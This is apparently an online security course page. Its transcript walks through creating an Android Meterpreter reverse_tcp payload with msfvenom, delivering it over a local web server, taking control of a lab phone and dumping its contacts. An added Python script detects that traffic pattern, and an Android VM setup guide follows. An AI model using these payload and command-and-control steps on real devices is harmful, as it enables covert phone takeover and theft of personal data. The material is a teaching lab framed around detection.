
How To: Mobile Malware

Developed with
QA

Overview
Difficulty: Beginner
Duration: 24m
Students: 131
Rating: 4.5/5

Description

This module will look at weaponization, or how hacking exploits can be created and disguised. The software simulations will cover the creation of mobile and desktop payloads.  

  • Weaponization 
  • Obfuscation 
  • Encryption 
  • Ciphers 
  • Desktop Malware 
  • Mobile Malware  
  • Windows App Malware Creation  
  • Mobile Malware Creation  

Please note: this content was produced in the UK and may include the use of British English. 

Intended Audience  

Although perceived as an IT issue, cyber security is, in fact, a subject relevant to all business units. Cyber Primer is aimed at anyone with an interest in cyber security, whether they are looking to pursue a career as a penetration tester, or just want to get a feel for the world of cyber security.  

 

Prerequisites of the Certifications 

There are no prerequisites for this course; however, participants are expected to have a basic understanding of computers and the internet. 

 

Feedback 

We welcome all feedback and suggestions - please contact us at qa.elearningadmin@qa.com to let us know what you think. 

Transcript

In this video we will create and test an Android payload. To follow along you will need to follow the instructions to install an Android virtual machine below the video. We will examine the functionality available to us once we have command and control over the affected device, and examine the network traffic that is sent over the C2 channel to better understand how to detect this kind of threat in the future.

Open the Kali VM. Log in using username root with the password toor. Open a terminal by clicking the small black box icon on the left of the screen, second from the top on the left. First we will create an undisguised Meterpreter payload, by running msfvenom -p android/meterpreter/reverse_tcp LHOST equals 10.0.2.30 LPORT equals 4444 R /root/Desktop/ExampleDomain.apk.

Now we need to test it. Launch the Android VM. While it's loading return to Kali. We're going to create a web server to deliver the payload and also set up a handler to receive the command and control channel that will leave the Android device and connect back to us. You will find the handler in the notes section of this video.

First, let's set up a web server. Now type python -m SimpleHTTPServer 80. This has started a small web server that will serve the contents of the attacker desktop. We must launch a new terminal now. Press Control + Shift + T to do so. Now launch Metasploit by typing msfconsole -r handler.rc. This will launch Meterpreter with the correct arguments preconfigured for the sake of time. If you'd like to see the arguments, feel free to open android_handler.rc in a text editor.

Now on the victim, open a web browser, and go to http://10.0.2.30. This will bring up a web page with ExampleDomain.apk. Click the link, download, install, and open the app. Back at the Kali VM, you will notice that the terminal with msfconsole running has now established a session with the compromised device. You can now control this device. You are now inside the phone. Type help to see what you can do.

We will now steal contacts from the device. Type dump_contacts. This should save the device's contacts into a text file on the attacker machine. Open a new terminal and type cat, followed by the name of the file that you just created. You can copy and paste it to save time. You are now inside the phone. Type help to see what other commands are at your fingertips and have a play.
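On the detection side, the sequence in the transcript leaves a recognisable network pattern: a client fetches an .apk over plain HTTP and, shortly afterwards, opens a connection to the same host on a different port. The following is an added example, not part of the course material, that correlates those two events; the CSV log format, the client address 10.0.2.15, the other sample rows and the 300-second window are assumptions made for illustration.

```python
import csv
import io

# Constructed sample records (not captured traffic): time in seconds, client,
# server, destination port, and for HTTP rows the path and Server header.
SAMPLE = """ts,src,dst,dport,path,server_header
100,10.0.2.15,10.0.2.30,80,/ExampleDomain.apk,SimpleHTTP/0.6 Python/2.7.18
130,10.0.2.15,10.0.2.30,4444,,
140,10.0.2.15,192.0.2.10,443,,
200,10.0.2.16,10.0.2.40,80,/app.apk,nginx
9000,10.0.2.16,10.0.2.40,8443,,
300,10.0.2.17,10.0.2.30,80,/index.html,SimpleHTTP/0.6 Python/2.7.18
310,10.0.2.17,10.0.2.30,4444,,
"""


def load(text):
    """Parse the CSV text into a list of row dictionaries."""
    return list(csv.DictReader(io.StringIO(text)))


def apk_then_callback(rows, window=300):
    """Flag clients that download an .apk over HTTP and then connect to the
    same server on a different port within `window` seconds."""
    downloads = {}  # (client, server) -> (time, http port, ad hoc server seen)
    alerts = []
    for r in sorted(rows, key=lambda r: int(r["ts"])):
        ts, port = int(r["ts"]), int(r["dport"])
        pair = (r["src"], r["dst"])
        path = r["path"].split("?")[0].lower()
        if path.endswith(".apk"):
            # Python's built-in SimpleHTTPServer announces itself in the
            # Server header; note it as extra context for the analyst.
            ad_hoc = r["server_header"].startswith("SimpleHTTP/")
            downloads[pair] = (ts, port, ad_hoc)
            continue
        seen = downloads.get(pair)
        if seen and not path and port != seen[1] and ts - seen[0] <= window:
            alerts.append({"client": r["src"], "server": r["dst"],
                           "port": port, "delay_s": ts - seen[0],
                           "ad_hoc_http_server": seen[2]})
    return alerts


if __name__ == "__main__":
    for alert in apk_then_callback(load(SAMPLE)):
        print(alert)
```

Only the first client is flagged: the second one connects back long after the window has closed, and the third never downloaded an APK.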

 

 --Android VM Installer--

In order to boot an Android VM, first, you will need to have:  

  1. VirtualBox installed and  

  2. Downloaded an Android ISO: Android 10 is the current OS, and you can find a source for an ISO here https://www.android-x86.org/. For this demo, we’re running through installing Marshmallow – Android 6. 

It’s worth remembering that Android operating system updates are often not pushed out by the mobile carrier, so playing around with a few older OS versions (when you’ve gotten to grips with the basics!) is worth a try.  

When you have the ISO downloaded, you’ll want to get it started. To begin, open VirtualBox, then select the “New” button to create a new virtual machine.  

Name the virtual machine, then select “Linux” as the type and “Linux 2.6 / 3.x / 4.x (32-bit)” as the version. Select next to go to the memory menu. You’ll then need to select the amount of memory. If you’re using a 32-bit Android build, it can only handle up to 2048MB (2GB) of memory. The 64-bit build allows you to use as much as you would like.  

Then, select “Create” to start building your Virtual Machine. The hard disk size should be automatically set as Dynamically Allocated, which will allow the virtual hard disk to grow as needed; leave this selected and select next.  

On the next step, you can choose how much storage you’d like to top the virtual machine out at. Even though it will dynamically resize, it won’t be allowed to grow past the size you define here. Choose whatever size will work best for your system. 

Finally, select the Create button. This will create the Virtual Machine. You’ll then need to install the Android ISO on to the Virtual Machine. With your machine all set up, highlight it and select Start at the top of VirtualBox. 

When the machine starts up, point it to the Android ISO you downloaded. It should allow you to choose this as soon as you fire it up, but if not, select Devices > Optical Drives > Choose Disk Image and select your Android ISO. Then use Machine > Reset to restart the virtual machine. 

Once the virtual machine loads the ISO, you’ll be presented with a list of install options. Use the keyboard to scroll down to “Install” and press enter. This will start the Android installer. 

Next, you’ll be presented the option to choose a partition. Select “Create/Modify” partitions. On the GPT screen, just choose “No.” 

On the disk utility screen, select “New.” 

Then select “Primary” to create a primary disk and allow it to use the entire virtual hard disk space you chose earlier. This should be selected by default. 

Hit Enter on the “Bootable” option to make the partition bootable, then choose “Write.”  

You will need to type “yes” and select Enter on the following screen to verify you want to write the partition table to the disk. 

Once it’s finished, highlight the Quit option and select Enter. 

Select the partition you just created to install Android on and tap Enter. 

Select “ext4” to format the partition. 

Highlight Yes and tap enter on the next screen to verify. 

Select “Yes” to install the GRUB bootloader. 

Select “Yes” to make the /system folder re-writable. 

Once everything is finished, you can choose to reboot into Android or reset. Feel free to do either, but don’t forget to unmount the ISO file first. Otherwise it’ll just boot right back into the installer. 

And that’s it! Next, you’ll be able to boot up the Android device and run the virtual machine just like a phone, although you won’t be able to make any calls. You’ll also need to leave the Wi-Fi turned off, as the virtual machine will use your PC’s connection.   

 

 

About the Author

Originating from a systems administration/network architecture career, he spent a solid part of his career building networks for educational institutes. With security being a mainstay of his implementations, he grew a strong passion for everything cyber orientated, especially social engineering. The educational experience led to him mentoring young women in IT, helping them to begin a cyber career. He is a recipient of the Cisco global cyber security scholarship, a CCNA Cyber Ops holder, and was elected for the CCNP Cyber Ops program.